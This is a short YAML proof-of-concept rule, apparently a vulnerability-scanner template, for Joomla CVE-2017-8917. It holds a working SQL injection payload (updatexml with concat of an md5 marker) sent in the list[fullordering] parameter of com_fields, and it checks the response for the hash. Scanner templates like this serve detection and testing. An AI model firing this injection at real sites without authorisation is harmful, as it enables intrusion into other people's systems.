name: poc-yaml-joomla-cve-2017-8917-sqli
rules:
  - method: GET
    path: "/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(8888)),1)"
    expression: response.body.bcontains(b"cf79ae6addba60ad018347359bd144d2")
detail:
  links:
    - https://github.com/vulhub/vulhub/tree/master/joomla/CVE-2017-8917